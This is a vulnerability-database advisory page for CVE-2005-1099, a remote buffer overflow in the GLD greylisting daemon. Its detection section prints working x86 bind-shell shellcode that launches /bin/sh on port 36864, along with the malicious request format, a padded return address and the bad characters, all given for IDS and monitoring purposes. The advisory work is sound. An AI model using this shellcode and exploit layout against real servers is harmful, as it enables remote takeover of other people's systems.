cbcvebase.
CVE-2005-1099
published 2005-04-12

CVE-2005-1099: Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow…

PriorityP262critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
67.66%
99.2th percentile
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.

Affected

7 ranges
VendorProductVersion rangeFixed in
debianpostfix-gld< postfix-gld 1.5-1 (bookworm)postfix-gld 1.5-1 (bookworm)
salim_gasmigld
salim_gasmigld
salim_gasmigld
salim_gasmigld
salim_gasmigld
salim_gasmigld

Detection & IOCsextracted from sources · hover to see the quote

port2525
port36864
commandsender=<payload>\r\nclient_address=<ret_addr x300>\r\n\r\n
bytes
\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh
  • Exploit targets TCP port 2525 (GLD greylisting daemon). Monitor for unexpected or malformed connections to this port, especially from non-Postfix sources.
  • Exploit payload is delivered via the 'sender=' field followed by a 'client_address=' field padded with 300 repetitions of a return address. Detect anomalously large or malformed GLD protocol messages containing these fields.
  • Successful exploitation results in a reverse/bind shell on TCP port 36864. Monitor for unexpected outbound or inbound connections on port 36864 from the GLD host.
  • The exploit bad characters for payload encoding are null byte, newline, carriage return, space, and equals sign. IDS signatures should look for long binary strings in GLD protocol fields lacking these characters.
  • The vulnerability resides in the HandleChild function in server.c of GLD 1.3 and 1.4. Process-level monitoring for crashes or unexpected child process spawning from the GLD daemon is advised.
  • ·The vulnerability is only exploitable when GLD is configured to listen on a network interface (not just localhost). Default or localhost-only deployments are not remotely exploitable.
  • ·The Metasploit module only includes a target for RedHat Linux 7.0 (Guinness) with a hardcoded return address (0xbfffa5d8). Exploitation against other distributions requires adjusted return addresses.
  • ·GLD 1.5-1 resolves this vulnerability in Debian. Ensure patched version is deployed.

CVSS provenance

nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.